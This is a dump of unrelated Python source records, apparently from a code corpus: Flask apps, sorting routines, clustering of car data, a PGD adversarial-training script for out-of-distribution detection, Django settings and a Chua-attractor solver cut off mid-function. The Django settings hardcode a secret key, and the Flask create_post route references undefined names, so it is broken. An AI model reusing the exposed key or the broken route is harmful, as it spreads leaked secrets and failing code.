'predictions_plot_test', 'True/Pred Test')\n else:\n predictions_plot_train = plotly_confusion_matrix('predictions_plot_train', 'Confusion Matrix Training', true_and_pred_train)\n predictions_plot_test = plotly_confusion_matrix('predictions_plot_test', 'Confusion Matrix Test', true_and_pred_val)\n for fold in pipe.outer_folds:\n overview_plot_training_trace = 
PlotlyTrace(('fold_' + str(fold.fold_nr) + '_training'), trace_color='rgb(91, 91, 91)')\n overview_plot_test_trace = PlotlyTrace(('fold_' + str(fold.fold_nr) + '_test'), trace_color='rgb(91, 91, 91)')\n if fold.best_config:\n metric_training_list = list()\n metric_validation_list = list()\n for key, value in fold.best_config.best_config_score.training.metrics.items():\n overview_plot_training_trace.add_x(key)\n overview_plot_training_trace.add_y(value)\n metric = Metric(key, value)\n metric_training_list.append(metric)\n\n for key, value in fold.best_config.best_config_score.validation.metrics.items():\n overview_plot_test_trace.add_x(key)\n overview_plot_test_trace.add_y(value)\n metric = Metric(key, value)\n metric_validation_list.append(metric)\n\n overview_plot_train.add_trace(overview_plot_training_trace)\n overview_plot_test.add_trace(overview_plot_test_trace)\n metric_training_trace = BestConfigTrace('training', metric_training_list, '', 'bar')\n metric_test_trace = BestConfigTrace('test', metric_validation_list, '', 'bar')\n best_config_plot = BestConfigPlot('outer_fold_' + str(fold.fold_nr) + '_best_config_overview', 'Best Performance Outer Fold ' + str(fold.fold_nr), metric_training_trace, metric_test_trace)\n best_config_plot_list.append(best_config_plot)\n\n training_mean_trace = PlotlyTrace('mean', trace_size=8, trace_color='rgb(31, 119, 180)')\n test_mean_trace = PlotlyTrace('mean', trace_size=8, trace_color='rgb(214, 123, 25)')\n for metric in pipe.metrics_train:\n if metric.operation == 'FoldOperations.MEAN':\n training_mean_trace.add_x(metric.metric_name)\n training_mean_trace.add_y(metric.value)\n\n for metric in pipe.metrics_test:\n if metric.operation == 'FoldOperations.MEAN':\n test_mean_trace.add_x(metric.metric_name)\n test_mean_trace.add_y(metric.value)\n\n overview_plot_train.add_trace(training_mean_trace)\n overview_plot_test.add_trace(test_mean_trace)\n return render_template('outer_folds/index.html', pipe=pipe, best_config_plot_list=best_config_plot_list, overview_plot_train=overview_plot_train,\n overview_plot_test=overview_plot_test,\n predictions_plot_train=predictions_plot_train,\n predictions_plot_test=predictions_plot_test,\n optimizer_history=optimizer_history,\n s=storage,\n available_pipes=available_pipes,\n cross_validation_info=cross_validation_info,\n data_info=data_info,\n optimizer_info=optimizer_info)\n except ValidationError as exc:\n return exc.message\n except ConnectionError as exc:\n return exc.message","sub_path":"pycfiles/photonai-1.0.0b0.tar/hyperpipe.cpython-36.py","file_name":"hyperpipe.cpython-36.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455352085","text":"import json\nfrom flask import Flask, jsonify, render_template, request\n\napp = Flask(__name__)\n\nspec_one = {\"x\": [40, 60, 80], \"y\": [40, 60, 80]}\n\n@app.route('/_add_numbers')\ndef add_numbers():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n return jsonify(result=a + b)\n\n@app.route('/_spectest')\ndef spectest():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n return json.dumps(spec_one)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
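A minimal usage sketch for the small Flask app above, assuming the app object defined in that app.py: the two AJAX endpoints can be exercised with Flask's built-in test client, no running server needed. Since /_spectest returns json.dumps(...) as a plain-text body, it is parsed manually rather than with resp.get_json().

import json

def smoke_test(app):
    # Exercise the AJAX endpoints through the Werkzeug test client.
    with app.test_client() as client:
        resp = client.get('/_add_numbers?a=2&b=3')
        assert resp.get_json()['result'] == 5
        # /_spectest serialized the dict itself, so parse the raw bytes.
        spec = json.loads(client.get('/_spectest').data)
        assert spec['x'] == [40, 60, 80]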
+{"seq_id":"80323782","text":"from math import floor #Used for rounding down (see merge_sort function)\nfrom math import ceil #Used for rounding up (see merge_sort function)\n\ndef selection(list, k=0):\n\tfor k in range(0, len(list)-1): #We don't need to run this for loop when k is the last element of the list, since by then the list will already be sorted\n\t\tfirst_element = list[k] #create an object that records the value of the first element that we are comparing to everything else in the list\n\t\tminimum_index = k #set the minimum_index to k, meaning k is (for now) the index of list that contains the lowest value\n\t\tfor index in range(k+1, len(list)): #compare k^th element to every other element after it in list\n\t\t\tif list[index] < list[k]: #If any other element in list is smaller than k, reset minimum_index to be the new element's index number\n\t\t\t\tminimum_index = index\n\t\tminimum = list[minimum_index] #extract the value of the smaller element\n\t\tif minimum < first_element:\n\t\t\tlist[k] = minimum #Switch the k^th element with the smaller element \n\t\t\tlist[minimum_index] = first_element\t\n\treturn list\n\ndef merge_sort(list):\n\tif len(list) <= 1:\n\t\treturn list\n\tleft = list[:len(list)/2] #Python somehow automatically knows that, even though len(list)/2 is an integer (rounded down), that when we write the colon before\n\tright = list[len(list)/2:] #we want the first half up to that integer, and when the colon comes after we want the integer + 1. So this still works even for lists of odd length. \n\tleft = merge_sort(left) #recursive part\n\tright = merge_sort(right) #recursive\n\ti = 0; j = 0\n\tmerged = [] #create empty list\n\twhile len(merged) < (len(left) + len(right)):\n\t\tif (i >= len(left)):\t\t #This and the first elif statement are designed to catch cases where we've already gone through every element of either right or left.\n\t\t\tmerged.append(right[j])\t #It basically just adds every remaining element of the right/left list onto the merged object in the original order. \n\t\t\tj += 1\t\t\t\t\t #This way we avoid indexing problems that would otherwise arise whenever we finished one of the lists before the other. 
\n\t\telif (j >= len(right)):\n\t\t\tmerged.append(left[i])\n\t\t\ti +=1\n\t\telif (right[j] <= left[i]): #Next two elif statements kick in if the previous few lines did not run; basically just switch the smaller values with earlier values\n\t\t\tmerged.append(right[j]) #when applicable, and then increment i/j\n\t\t\tj += 1\n\t\telif left[i] < right[j]:\n\t\t\tmerged.append(left[i])\n\t\t\ti += 1\n\treturn merged\t","sub_path":"hw3/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557535054","text":"import os\n\nfrom flask import Flask, jsonify, render_template, redirect, url_for, flash\nfrom flask_login import (\n current_user,\n login_user,\n login_required,\n LoginManager,\n logout_user,\n)\nfrom weaver.model import db, migrate, User, Post\nfrom weaver.forms import LoginForm, PostForm\n\n\ndef create_app():\n app = Flask(__name__, instance_relative_config=True)\n login_manager = LoginManager(app)\n db_url = os.getenv(\"DATABASE_URL\", \"postgresql://localhost/weaver\")\n secret_key = os.getenv(\"WV_SECRET_KEY\", \"dev\")\n\n app.config.from_mapping(\n SECRET_KEY=secret_key,\n SQLALCHEMY_DATABASE_URI=db_url,\n SQLALCHEMY_TRACK_MODIFICATIONS=False,\n )\n\n try:\n os.makedirs(app.instance_path)\n except FileExistsError:\n pass\n\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(int(user_id))\n\n @app.route(\"/\", methods=[\"GET\"])\n def index():\n if current_user.is_authenticated:\n return render_template(\"index.html\", posts=Post.query.all())\n else:\n return render_template(\"index.html\")\n\n @app.route(\"/login\", methods=[\"GET\", \"POST\"])\n def login():\n if current_user.is_authenticated:\n return redirect(url_for(\"index\"))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n flash(\"invalid login!\")\n return redirect(url_for(\"login\"))\n login_user(user)\n return redirect(url_for(\"index\"))\n return render_template(\"login.html\", form=form)\n\n @app.route(\"/logout\", methods=[\"GET\"])\n def logout():\n logout_user()\n return redirect(url_for(\"login\"))\n\n @app.route(\"/post\", methods=[\"GET\", \"POST\"])\n @app.route(\"/post/\", methods=[\"GET\", \"POST\"])\n @login_required\n def submit_post(parent=None):\n form = PostForm()\n if form.validate_on_submit():\n new_post = Post(body=form.body.data, parent=parent)\n new_post.author = current_user\n new_post.make_digest()\n db.session.add(new_post)\n db.session.commit()\n return redirect(url_for(\"index\"))\n return render_template(\"post.html\", form=form)\n\n @app.route(\"/api/posts/all\", methods=[\"GET\"])\n @login_required\n def posts():\n all_posts = [\n {\n \"author\": p.author.username,\n \"parent\": p.parent,\n \"body\": p.body,\n \"created\": p.created,\n }\n for p in Post.query.all()\n ]\n return jsonify(all_posts)\n\n @app.route(\"/api/posts\", methods=[\"POST\"])\n @login_required\n def create_post():\n if \"body\" not in post_params:\n return \"Missing 'body' field in JSON.\", 400\n new_post = Post(**request.json)\n new_post.author = current_user\n new_post.make_digest()\n db.session.add(new_post)\n db.session.commit()\n\n db.init_app(app)\n migrate.init_app(app, db)\n\n return 
app\n","sub_path":"weaver/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393192788","text":"# 使用KMeans进行聚类\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import preprocessing\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n# 数据加载\r\n#data = pd.read_csv('CarPrice_Assignment.csv', encoding='gbk')\r\ndata = pd.read_csv('CarPrice_Assignment.csv')\r\ntrain_x = data[['symboling', 'fueltype', 'aspiration', 'doornumber', 'carbody', 'drivewheel', 'enginelocation', 'wheelbase',\\\r\n 'carlength', 'carwidth', 'carheight', 'curbweight', 'enginetype', 'cylindernumber', 'enginesize', 'fuelsystem', 'boreratio',\\\r\n 'stroke', 'compressionratio', 'horsepower', 'peakrpm', 'citympg', 'highwaympg', 'price']]\r\n# print(train_x['fueltype'])\r\n\r\n# 如果存在非数值类型,需要使用LabelEncoder 将性别字段转化为数值male, female => 0, 1\r\nfrom sklearn.preprocessing import LabelEncoder\r\nle = LabelEncoder()\r\ntrain_x['fueltype'] = le.fit_transform(train_x['fueltype'])\r\ntrain_x['aspiration'] = le.fit_transform(train_x['aspiration'])\r\ntrain_x['doornumber'] = le.fit_transform(train_x['doornumber'])\r\ntrain_x['carbody'] = le.fit_transform(train_x['carbody'])\r\ntrain_x['drivewheel'] = le.fit_transform(train_x['drivewheel'])\r\ntrain_x['enginelocation'] = le.fit_transform(train_x['enginelocation'])\r\ntrain_x['enginetype'] = le.fit_transform(train_x['enginetype'])\r\ntrain_x['cylindernumber'] = le.fit_transform(train_x['cylindernumber'])\r\ntrain_x['fuelsystem'] = le.fit_transform(train_x['fuelsystem'])\r\n\r\n# print(train_x['fueltype'])\r\n\r\n\r\n# 规范化到 [0,1] 空间\r\nmin_max_scaler=preprocessing.MinMaxScaler()\r\n# train_x是个矩阵,包括4个列,每列分别做[min, max]\r\ntrain_x=min_max_scaler.fit_transform(train_x)\r\npd.DataFrame(train_x).to_csv('temp.csv', index=False,encoding='gbk')\r\n#print(train_x)\r\n\r\n\r\n### 使用KMeans聚类\r\nkmeans = KMeans(n_clusters=5)\r\n# 训练\r\nkmeans.fit(train_x)\r\n# 预测\r\npredict_y = kmeans.predict(train_x)\r\n# 合并聚类结果,插入到原数据中\r\nresult = pd.concat((data,pd.DataFrame(predict_y)),axis=1)\r\nresult.rename({0:u'聚类结果'},axis=1,inplace=True)\r\nprint(result)\r\n# 将结果导出到CSV文件中\r\nresult.to_csv(\"car_assignment.csv\",index=False,encoding='gbk')\r\n\r\n# K-Means 手肘法:统计不同K取值的误差平方和\r\nimport matplotlib.pyplot as plt\r\nsse = []\r\nfor k in range(1, 11):\r\n\t# kmeans算法\r\n\tkmeans = KMeans(n_clusters=k)\r\n\tkmeans.fit(train_x)\r\n\t# 计算inertia簇内误差平方和\r\n\tsse.append(kmeans.inertia_)\r\nx = range(1, 11)\r\nplt.xlabel('K')\r\nplt.ylabel('SSE')\r\nplt.plot(x, sse, 'o-')\r\nplt.show()\r\n\r\n## 使用层次聚类\r\nfrom scipy.cluster.hierarchy import dendrogram, ward\r\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\r\nimport matplotlib.pyplot as plt\r\nmodel = AgglomerativeClustering(linkage='ward', n_clusters=3)\r\ny = model.fit_predict(train_x)\r\nprint(y)\r\n\r\nlinkage_matrix = ward(train_x)\r\ndendrogram(linkage_matrix)\r\nplt.show()\r\n\r\n","sub_path":"L3/car_assignment.py","file_name":"car_assignment.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353324706","text":"import os\nimport numpy as np\nimport torch\nimport argparse\nfrom tensorboardX import SummaryWriter\nimport shutil\nimport time\nimport torch.backends.cudnn as cudnn\nfrom tqdm import tqdm\nimport sys\nsys.path.append('./')\nimport utils.losses as losses\nimport utils.detectors as detectors\nimport utils.metrics as 
metrics\nimport utils.optimizer as optim\nfrom models.model_builder import getModel\nfrom datasets.data_loader import getDataLoader\nfrom utils.pgd_attack import LinfPGDAttack\nfrom config import cfg\n\nglobal global_cfg\nglobal_cfg = dict()\n\n\ndef summary_write(summary, writer):\n for key in summary.keys():\n writer.add_scalar(key, summary[key], summary['epoch'])\n \n\ndef train_epoch_wo_outlier(model, optimizer, in_loader, loss_func, cur_epoch, op_cfg, writer):\n global global_cfg\n model.train()\n avg_loss = 0\n correct = 0\n in_data_size = len(in_loader.dataset)\n for cur_iter, in_set in enumerate(in_loader):\n #TODO: Dimension of in_set and out_set should be checked!\n \n # Data to GPU\n data = in_set[0]\n targets = in_set[1]\n if cur_iter == 0:\n writer.add_image('in_dist target {}'.format(targets[0]), data[0], cur_epoch)\n data, targets = data.cuda(), targets.cuda()\n \n # Adjust Learning rate\n lr = optim.get_lr_at_epoch(op_cfg, cur_epoch + float(cur_iter) / in_data_size)\n optim.set_lr(optimizer, lr)\n \n # Forward propagation and calculate loss\n logits = model(data)\n \n global_cfg['loss']['model'] = model\n global_cfg['loss']['data'] = data\n loss_dict = loss_func(logits, targets, global_cfg['loss'])\n loss = loss_dict['loss']\n\n \n # Back propagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n # Calculate classifier error about in-distribution sample\n num_topks_correct = metrics.topks_correct(logits[:len(targets)], targets, (1,))\n [top1_correct] = [x for x in num_topks_correct]\n \n # Add additional metrics!!!\n \n loss, top1_correct = loss.item(), top1_correct.item()\n avg_loss += loss\n correct += top1_correct\n \n summary = {\n 'avg_loss': avg_loss / in_data_size,\n 'classifier_acc': correct / in_data_size,\n 'lr': optim.get_lr_at_epoch(op_cfg, cur_epoch),\n 'epoch': cur_epoch,\n }\n \n return summary\n \n \ndef valid_epoch_wo_outlier(model, in_loader, loss_func, cur_epoch):\n global global_cfg\n model.eval()\n avg_loss = 0\n correct = 0\n in_data_size = len(in_loader.dataset)\n for cur_iter, in_set in enumerate(in_loader): \n # Data to GPU\n data = in_set[0]\n targets = in_set[1]\n data, targets = data.cuda(), targets.cuda()\n \n # Forward propagation and calculate loss\n logits = model(data)\n\n global_cfg['loss']['model'] = model\n global_cfg['loss']['data'] = data\n loss_dict = loss_func(logits, targets, global_cfg['loss'])\n loss = loss_dict['loss']\n \n # Calculate classifier error about in-distribution sample\n num_topks_correct = metrics.topks_correct(logits[:len(targets)], targets, (1,))\n [top1_correct] = [x for x in num_topks_correct]\n \n # Add additional metrics!!\n \n \n loss, top1_correct = loss.item(), top1_correct.item()\n avg_loss += loss\n correct += top1_correct\n \n summary = {\n 'avg_loss': avg_loss / in_data_size,\n 'classifier_acc': correct / in_data_size,\n 'epoch': cur_epoch,\n }\n \n return summary\n \n\n\ndef train_epoch_w_outlier(model, optimizer, in_loader, out_loader, loss_func, cur_epoch, op_cfg, writer, attack_in, attack_out):\n global global_cfg\n model.train()\n avg_loss = 0\n avg_in_loss = 0\n avg_out_loss = 0\n correct = 0\n total = 0\n in_data_size = len(in_loader.dataset)\n out_loader.dataset.offset = np.random.randint(len(out_loader.dataset))\n for cur_iter, (in_set, out_set) in enumerate(zip(in_loader, out_loader)):\n #TODO: Dimension of in_set and out_set should be checked!\n \n # Perturb data and move to GPU\n targets = in_set[1].cuda()\n adv_in_input = attack_in.perturb(in_set[0].cuda(), targets)\n 
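# Both batches are perturbed before being concatenated below: inliers with a\n # label-aware cross-entropy PGD attack, outliers with an outlier-exposure ('OE')\n # attack, i.e. the ALOE-style adversarial training this script is named after.\n 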
adv_out_input = attack_out.perturb(out_set[0].cuda())\n adv_input = torch.cat((adv_in_input, adv_out_input), 0).cuda()\n #print(\"inlier batch: {} | outlier batch: {}\".format(in_set[0].size(0), out_set[0].size(0)))\n if cur_iter == 0:\n \n writer.add_image('In/Original', in_set[0][0], cur_epoch)\n writer.add_image('In/Perturb', adv_in_input[0], cur_epoch)\n #writer.add_image('In/Diff', (adv_in_input[0] - in_set[0][0]).cuda(), cur_epoch)\n writer.add_image('Out/Original', out_set[0][0], cur_epoch)\n writer.add_image('Out/Perturb', adv_out_input[0], cur_epoch)\n #writer.add_image('Out/Diff', (adv_out_input[0] - out_set[0][0]).cuda(), cur_epoch)\n \n # Adjust Learning rate\n lr = optim.get_lr_at_epoch(op_cfg, cur_epoch + float(cur_iter) / in_data_size)\n optim.set_lr(optimizer, lr)\n \n # Forward\n logits = model(adv_input)\n \n # Calculate loss\n global_cfg['loss']['model'] = model\n loss_dict = loss_func(logits, targets, global_cfg['loss']) \n loss = loss_dict['loss']\n in_loss = loss_dict['in_loss'].data\n out_loss = loss_dict['out_loss'].data\n \n # Back propagation \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n ## METRICS ##\n # Calculate classifier error about in-distribution sample\n num_topks_correct = metrics.topks_correct(logits[:len(targets)], targets, (1,))\n [top1_correct] = [x for x in num_topks_correct]\n \n # Calculate OOD metrics (auroc, aupr, fpr)\n #(auroc, aupr, fpr) = metrics.get_ood_measures(confidences, targets)\n \n # Add additional metrics!!!\n \n \n ## UPDATE STATS ##\n loss, top1_correct = loss.item(), top1_correct.item()\n avg_loss += loss\n avg_in_loss += in_loss\n avg_out_loss += out_loss\n correct += top1_correct\n total += targets.size(0)\n \n summary = {\n 'avg_loss': avg_loss / total,\n 'avg_in_loss': avg_in_loss / total,\n 'avg_out_loss': avg_out_loss / total,\n 'classifier_acc': correct / total,\n 'lr': optim.get_lr_at_epoch(op_cfg, cur_epoch),\n 'epoch': cur_epoch,\n }\n \n return summary\n \n \ndef valid_epoch_w_outlier(model, in_loader, out_loader, loss_func, detector_func, cur_epoch):\n global global_cfg \n model.eval()\n avg_loss = 0\n correct = 0\n total = 0\n max_iter = 0\n avg_auroc = 0\n avg_aupr = 0\n avg_fpr = 0\n in_data_size = len(in_loader.dataset)\n for cur_iter, (in_set, out_set) in enumerate(zip(in_loader, out_loader)): \n # Data to GPU\n data = torch.cat((in_set[0], out_set[0]), 0)\n targets = in_set[1]\n data, targets = data.cuda(), targets.cuda()\n \n # Forward propagation and calculate loss and confidence\n logits = model(data)\n global_cfg['loss']['model'] = model\n global_cfg['loss']['data'] = data\n global_cfg['detector']['model'] = model\n global_cfg['detector']['data'] = data\n loss_dict = loss_func(logits, targets, global_cfg['loss'])\n loss = loss_dict['loss']\n confidences_dict = detector_func(logits, targets, global_cfg['detector'])\n confidences = confidences_dict['confidences']\n \n ## METRICS ##\n # Calculate classifier error about in-distribution sample\n num_topks_correct = metrics.topks_correct(logits[:len(targets)], targets, (1,))\n [top1_correct] = [x for x in num_topks_correct]\n \n # Calculate OOD metrics (auroc, aupr, fpr)\n (auroc, aupr, fpr) = metrics.get_ood_measures(confidences, targets)\n \n # Add additional metrics!!!\n \n ## Update stats ##\n loss, top1_correct = loss.item(), top1_correct.item()\n avg_loss += loss\n correct += top1_correct\n total += targets.size(0)\n max_iter += 1\n avg_auroc += auroc\n avg_aupr += aupr\n avg_fpr += fpr\n \n \n summary = {\n 'avg_loss': avg_loss / total,\n 
'classifier_acc': correct / total,\n        'AUROC': avg_auroc / max_iter,\n        'AUPR' : avg_aupr / max_iter,\n        'FPR95': avg_fpr / max_iter,\n        'epoch': cur_epoch,\n    }\n    \n    return summary\n    \ndef main():\n    global global_cfg\n    # Reproducibility\n    np.random.seed(cfg['seed'])\n    torch.manual_seed(cfg['seed'])\n    \n    # Model & Optimizer\n    model = getModel(cfg['model'])\n    optimizer = optim.getOptimizer(model, cfg['optim'])\n    start_epoch = 1\n    \n    # Load model and optimizer\n    if cfg['load_ckpt'] != '':\n        checkpoint = torch.load(cfg['load_ckpt'], map_location=\"cpu\")\n        model.load_state_dict(checkpoint['model_state'])\n        print(\"load model on '{}' is complete.\".format(cfg['load_ckpt']))\n        if not cfg['finetuning']:\n            optimizer.load_state_dict(checkpoint['optimizer_state'])\n        if 'epoch' in checkpoint.keys() and not cfg['finetuning']:\n            start_epoch = checkpoint['epoch']\n            print(\"Restore epoch {}\".format(start_epoch))\n        else:\n            start_epoch = 1\n    cudnn.benchmark = True\n    \n    # Data Loader\n    in_train_loader = getDataLoader(ds_cfg=cfg['in_dataset'],\n                                    dl_cfg=cfg['dataloader'],\n                                    split=\"train\")\n    in_valid_loader = getDataLoader(ds_cfg=cfg['in_dataset'],\n                                    dl_cfg=cfg['dataloader'],\n                                    split=\"valid\")\n    \n    attack_in = LinfPGDAttack(model=model, eps=cfg['PGD']['epsilon'], nb_iter=cfg['PGD']['iters'],\n                              eps_iter=cfg['PGD']['iter_size'], rand_init=True, loss_func='CE')\n    \n    if cfg['out_dataset'] is not None:\n        out_train_loader = getDataLoader(ds_cfg=cfg['out_dataset'],\n                                         dl_cfg=cfg['dataloader'],\n                                         split=\"train\")\n        out_valid_loader = getDataLoader(ds_cfg=cfg['out_dataset'],\n                                         dl_cfg=cfg['dataloader'],\n                                         split=\"valid\")\n        attack_out = LinfPGDAttack(model = model, eps=cfg['PGD']['epsilon'], nb_iter=cfg['PGD']['iters'],\n                                   eps_iter=cfg['PGD']['iter_size'], rand_init=True, loss_func='OE')\n        \n    else:\n        out_train_loader = None\n        out_valid_loader = None\n        attack_out = None\n    \n    # Result directory and make tensorboard event file\n    exp_dir = os.path.join(cfg['exp_root'], cfg['exp_dir'])\n    if os.path.exists(exp_dir) is False:\n        os.makedirs(exp_dir)\n    shutil.copy('./config.py', os.path.join(exp_dir, \"config.py\"))\n    writer_train = SummaryWriter(logdir=os.path.join(exp_dir, 'log', 'train'))\n    writer_valid = SummaryWriter(logdir=os.path.join(exp_dir, 'log', 'valid'))\n    \n    # Stats Meters\n    #train_meter = TrainMeter()\n    #valid_meter = ValidMeter()\n    \n    # Loss function\n    loss_func = losses.getLoss(cfg['loss'])\n    global_cfg['loss'] = cfg['loss']\n    \n    # Outlier detector\n    detector_func = detectors.getDetector(cfg['detector'])\n    global_cfg['detector'] = cfg['detector']\n    \n    print(\"=======================IMPORTANT CONFIG=======================\")\n    print(\" Model : {}\\n \\\nLoss : {}\\n \\\nDetector : {}\\n \\\nOptimizer: {}\\n\".format(cfg['model']['network_kind'], cfg['loss']['loss'], cfg['detector']['detector'], cfg['optim']['optimizer']))\n    print(\"============Start training. 
Result will be saved in {}\".format(exp_dir))\n \n for cur_epoch in range(start_epoch, cfg['max_epoch'] + 1):\n if out_train_loader is not None:\n train_summary = train_epoch_w_outlier(model, optimizer,\n in_train_loader, out_train_loader,\n loss_func, cur_epoch,\n cfg['optim'], writer_train, attack_in, attack_out)\n else:\n train_summary = train_epoch_wo_outlier(model, optimizer,\n in_train_loader, loss_func,\n cur_epoch, cfg['optim'], writer_train, attack_in)\n summary_write(summary=train_summary, writer=writer_train)\n print(\"Training result=========Epoch [{}]/[{}]=========\\nlr: {} | loss: {} | attacked_acc: {}\\nin_loss: {} | out_loss: {}\".format(cur_epoch, cfg['max_epoch'], train_summary['lr'], train_summary['avg_loss'], train_summary['classifier_acc'], train_summary['avg_in_loss'], train_summary['avg_out_loss']))\n \n \n if cur_epoch % cfg['valid_epoch'] == 0:\n if out_valid_loader is not None:\n valid_summary = valid_epoch_w_outlier(model,\n in_valid_loader, out_valid_loader,\n loss_func, detector_func, cur_epoch)\n else:\n valid_summary = valid_epoch_wo_outlier(model,\n in_valid_loader,\n loss_func, cur_epoch)\n summary_write(summary=valid_summary, writer=writer_valid)\n print(\"Validate result=========Epoch [{}]/[{}]=========\\nloss: {} | acc: {}\".format(cur_epoch, cfg['max_epoch'], valid_summary['avg_loss'], valid_summary['classifier_acc']))\n \n if cur_epoch % cfg['ckpt_epoch'] == 0:\n ckpt_dir = os.path.join(cfg['exp_root'], cfg['exp_dir'], \"ckpt\")\n if os.path.exists(ckpt_dir) is False:\n os.makedirs(ckpt_dir)\n model_state = model.module.state_dict() if cfg['ngpu'] > 1 else model.state_dict()\n checkpoint = {\n \"epoch\": cur_epoch,\n \"model_state\": model_state,\n \"optimizer_state\": optimizer.state_dict(),\n }\n ckpt_name = \"checkpoint_epoch_{}\".format(cur_epoch)\n ckpt_path = os.path.join(ckpt_dir, ckpt_name + \".pyth\")\n torch.save(checkpoint, ckpt_path)\n \n\nif __name__==\"__main__\":\n print(\"Setup Training...\")\n main()","sub_path":"tools/train_aloe.py","file_name":"train_aloe.py","file_ext":"py","file_size_in_byte":14697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"180923240","text":"# Django settings for Smash project.\nfrom constants import *\nimport os\ndef absPath(rel):\n return os.path.join(ROOT_PATH, '..', rel)\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nADMIN_MEDIA_PREFIX = '/static/admin/'\nROOT_PATH = os.path.dirname(__file__)\nADMINS = (\n ('Jack Reilly', 'jackdreilly@gmail.com'),\n)\nMANAGERS = ADMINS\nTIME_ZONE = 'America/Los_Angeles'\n\n\n\nMEDIA_ROOT = absPath('media')\nMEDIA_URL = '/media'\nSTATIC_URL = '/static'\nSTATIC_ROOT = absPath('static')\n\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n)\n\n# Examples: \"http://foo.com/static/admin/\", \"/static/admin/\".\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n# 'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'jke$n#$1c72ex!ykevokt5!i^gn(24n(l647t9=4dnt(vge5*q'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 
'django.middleware.gzip.GZipMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = '%s.urls' % PROJECT_NAME\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'frontend',\n 'south',\n 'dajaxice',\n 'dajax',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n","sub_path":"src/Clothesliner/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63239690","text":"from ipywidgets import interact, interactive, HBox, Layout,VBox\n\nimport numpy as np\nfrom scipy import integrate\n\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.colors import cnames\nfrom matplotlib import animation\n\ndef solve_chua(numberOfTrajectories=10, min_x0=0.0, max_x0=0.5, anglex=0.0, angley=30.0, max_time=14.0, alpha=15.6, beta=1, gamma=28,m0=-1.143, m1=-0.714):\n\n fig = plt.figure(figsize=(8, 6), dpi=80)\n ax = fig.add_axes([0, 0, 1, 1], projection='3d')\n ax.axis('off')\n\n # prepare the axes limits\n ax.set_xlim((-40, 40))\n ax.set_ylim((-60, 60))\n ax.set_zlim((5, 55))\n \n def g(x,m0,m1):\n rv=0\n if x<= -1:\n rv=m1*x+m1-m0;\n elif x<=1:\n rv=m0*x;\n else:\n rv=m1*x+m0-m1\n return rv\n \n def chua_deriv(x_y_z, t0, alpha=alpha, beta=beta, gamma=gamma,m0=m0,m1=m1):\n \"\"\"Compute the time-derivative of a Chua system.\"\"\"\n x, y, z = x_y_z\n return [alpha * (y - x -g(x,m0,m1)), beta*(x - y + z), -gamma * y]\n\n # Choose random starting points, uniformly distributed from min_x0 to max_x0\n np.random.seed(1)\n span=max_x0-min_x0\n x0 = min_x0 + span * np.random.random((numberOfTrajectories, 3))\n\n # Solve for the trajectories\n t = np.linspace(0, max_time, int(250*max_time))\n x_t = np.asarray([integrate.odeint(chua_deriv, x0i, t)\n for x0i in x0])\n \n # choose a different color for each trajectory\n colors = plt.cm.viridis(np.linspace(0, 1, numberOfTrajectories))\n\n mins={\"x\":[],\"y\":[],\"z\":[]}\n 